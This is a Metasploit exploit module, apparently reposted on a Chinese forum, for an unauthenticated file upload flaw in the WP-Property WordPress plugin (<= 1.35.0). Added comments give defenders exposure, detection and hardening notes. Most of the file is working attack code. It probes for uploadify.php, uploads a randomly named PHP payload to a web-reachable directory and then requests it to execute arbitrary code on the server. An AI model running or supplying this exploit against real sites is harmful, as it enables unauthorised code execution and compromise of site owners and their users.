WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

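require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description). The plugin ships
# third-party/uploadify/uploadify.php, which accepts a multipart upload
# without authentication and stores it under a web-reachable directory.
#
# Notes for defenders reading this listing:
# - Exposure: any site running WP-Property <= 1.35.0 with the bundled
#   uploadify.php reachable. Upgrade the plugin or remove/deny access to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php.
# - Detection: web-server logs showing a multipart POST to that script with
#   a "Filedata" part whose filename ends in .php, followed by a GET for a
#   file in the same directory. The upload is requested with
#   :unlink_self => true, so the file is presumably removed after it runs;
#   request logs are the more reliable artefact (confirm against PhpEXE).
# - Hardening: disable PHP execution in plugin upload/temp directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The forum rendering of this listing mangled this constant; the required
  # file above (msf/core/exploit/php_exe) provides the PhpEXE mixin.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the TARGETURI option that points at the WordPress base path.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the presence of the bundled uploadify.php script.
  #
  # Returns CheckCode::Appears on any HTTP 200 and CheckCode::Unknown
  # otherwise. The plugin version is not inspected, so "Appears" only means
  # the script answered; "Unknown" does not establish that a site is patched.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php and then
  # requests the location the server reports back.
  #
  # Fails with Failure::UnexpectedReply when there is no response, the status
  # is not 200, or the response body does not contain the uploaded file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form parts: the file itself ("Filedata") and the destination
    # directory ("folder"), which the request points back at the plugin's
    # own uploadify directory.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary line at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # NOTE(review): the whole response body is used as the request path; this
    # assumes the script replies with nothing but the stored file's path.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end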
不要问我这写的是什么 怎么利用 我是说msf.